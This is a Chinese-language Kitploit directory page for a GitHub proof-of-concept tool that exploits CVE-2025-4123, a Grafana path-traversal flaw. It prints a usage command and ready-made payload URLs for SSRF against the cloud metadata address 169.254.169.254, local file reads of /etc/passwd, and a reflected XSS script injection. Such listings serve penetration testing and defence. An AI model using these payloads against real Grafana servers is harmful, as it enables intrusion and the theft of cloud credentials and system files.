Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-4123-Exploit-Tool-Grafana- — CVE-2025-4123 - Grafana 工具 | Kitploit
工具/GitHubGitHub/ynsmroztas/cve-2025-4123-exploit-tool-grafana-
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队
GitHubynsmroztas/cve-2025-4123-exploit-tool-grafana-

CVE-2025-4123-Exploit-Tool-Grafana-

CVE-2025-4123 - Grafana 工具

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
3261年前Kitploit 审核通过
分享

CVE-2025-4123 - Grafana 路径遍历漏洞利用工具

由 mitsec 开发

这是一个针对 CVE-2025-4123 的概念验证 (PoC) 漏洞利用工具,该漏洞是 Grafana 的 /public 端点中的一个严重路径遍历漏洞。该漏洞利用可以实现:

  • ✅ 服务端请求伪造 (SSRF)
  • ✅ 本地文件包含 (LFI)
  • ✅ 开放重定向
  • ✅ 跨站脚本攻击 (XSS)

🔥 受影响

Grafana 实例中 /public/ 端点未正确处理编码路径,例如:

root@kitploit:~
/public/..%2F%5coast.pro%2F%3f%2F..%2F..

🚀 使用方法

root@kitploit:~
python3 cve_2025_4123_exploit_mitsec_final.py

然后选择所需的模式:

  1. SSRF - 内部服务,如 169.254.169.254
  2. LFI - 读取文件,如 /etc/passwd
  3. 开放重定向 - 重定向到外部域名
  4. XSS - 在公共路径中注入 JavaScript

🧪 示例

root@kitploit:~
[*] SSRF URL: http://127.0.0.1:3000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F..
[*] LFI URL:  http://127.0.0.1:3000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd
[*] XSS URL:  http://127.0.0.1:3000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E

📄 免责声明

此代码仅供教育和授权测试使用。未经同意对系统进行未经授权的使用是违法的。


✍️ 作者

  • mitsec
下载工具